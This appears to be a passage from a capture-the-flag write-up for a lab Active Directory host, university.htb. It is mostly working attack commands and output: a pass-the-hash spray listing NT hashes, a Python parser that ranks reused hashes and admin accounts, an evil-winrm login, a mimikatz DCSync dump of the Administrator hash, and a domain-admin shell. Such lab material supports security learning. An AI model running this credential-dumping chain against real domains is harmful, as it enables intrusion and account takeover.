nxc smb university.htb -u users.txt -H hashes --continue-on-success
SMB 10.10.11.39 445 DC [-] university.htb\William.B:ba76a28db8aaeb636566a414f3e104aa STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [+] university.htb\Martin.T:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\C.Freez:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Emma.H:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Rose.L:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Choco.L:ba76a28db8aaeb636566a414f3e104aa (Pwn3d!)
SMB 10.10.11.39 445 DC [+] university.htb\Brose.W:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Nya.R:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Jakken.C:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Lisa.K:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Kareem.A:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Arnold.G:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Kai.K:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\A.Crouz:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Leon.K:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Karol.J:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Steven.P:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\Alice.Z:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\karma.watterson:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\hana:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [-] university.htb\WAO:ba76a28db8aaeb636566a414f3e104aa STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [+] university.htb\George.A:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\John.D:ba76a28db8aaeb636566a414f3e104aa
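With a few hundred users the spray output is easier to act on once it is parsed. The following Python, an added example rather than anything from the write-up, takes nxc lines of the form shown above (a handful reproduced here as constructed sample input) and reports which accounts accept a given NT hash and which of those are local admin on the target, the Pwn3d! marker that singles out choco.l.

```python
"""Turn nxc pass-the-hash spray output into a reuse report (added example)."""
import re
from dataclasses import dataclass

# Constructed sample: five lines copied from the spray above.
SAMPLE = """\
SMB 10.10.11.39 445 DC [-] university.htb\\William.B:ba76a28db8aaeb636566a414f3e104aa STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [+] university.htb\\Martin.T:ba76a28db8aaeb636566a414f3e104aa
SMB 10.10.11.39 445 DC [+] university.htb\\Choco.L:ba76a28db8aaeb636566a414f3e104aa (Pwn3d!)
SMB 10.10.11.39 445 DC [-] university.htb\\WAO:ba76a28db8aaeb636566a414f3e104aa STATUS_LOGON_FAILURE
SMB 10.10.11.39 445 DC [+] university.htb\\John.D:ba76a28db8aaeb636566a414f3e104aa
"""

# [+]/[-] result, DOMAIN\user, 32-hex NT hash, then the status or the Pwn3d! marker.
LINE = re.compile(
    r"\[(?P<ok>[+-])\]\s+(?P<domain>[^\\]+)\\(?P<user>[^:]+):(?P<nthash>[0-9a-f]{32})(?P<rest>.*)$"
)


@dataclass
class Hit:
    user: str
    nthash: str
    admin: bool  # nxc prints "(Pwn3d!)" when the account is local admin on the target


def parse(output: str):
    """Return (successful hits, users that failed); unrelated lines are skipped."""
    hits, failures = [], []
    for line in output.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        if m["ok"] == "+":
            hits.append(Hit(m["user"], m["nthash"], "Pwn3d!" in m["rest"]))
        else:
            failures.append(m["user"])
    return hits, failures


def reuse_report(output: str):
    """NT hash -> sorted list of accounts that accepted it, i.e. accounts
    sharing a password; one hash with many users is the finding here."""
    hits, _ = parse(output)
    by_hash = {}
    for h in hits:
        by_hash.setdefault(h.nthash, set()).add(h.user)
    return {k: sorted(v, key=str.lower) for k, v in by_hash.items()}


def admins(output: str):
    """Accounts that are local admin on the sprayed host: the ones to try first."""
    return sorted(h.user for h in parse(output)[0] if h.admin)


if __name__ == "__main__":
    for nthash, users in reuse_report(SAMPLE).items():
        print(f"{nthash}: {len(users)} accounts share this hash: {', '.join(users)}")
    print("local admin on target:", ", ".join(admins(SAMPLE)))
```

Feed it the real output with `nxc ... | tee spray.log` and `reuse_report(open('spray.log').read())`; the same parser works for password sprays, since nxc prints the password in place of the hash.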
BloodHound shows choco.l has DCSync rights (GetChanges and GetChangesAll on the domain university.htb); nxc also flagged the account Pwn3d!, i.e. local admin on the DC. Log in with the reused hash:
evil-winrm -i university.htb -u 'choco.l' -H 'ba76a28db8aaeb636566a414f3e104aa'
Upload mimikatz to DC:
- https://github.com/ParrotSec/mimikatz/raw/master/x64/mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /domain:university.htb /user:Administrator" exit
Hash NTLM: e63413bab01a0b8820983496c0be3a9a
evil-winrm -i university.htb -u Administrator -H e63413bab01a0b8820983496c0be3a9a
We get a shell as Administrator on DC.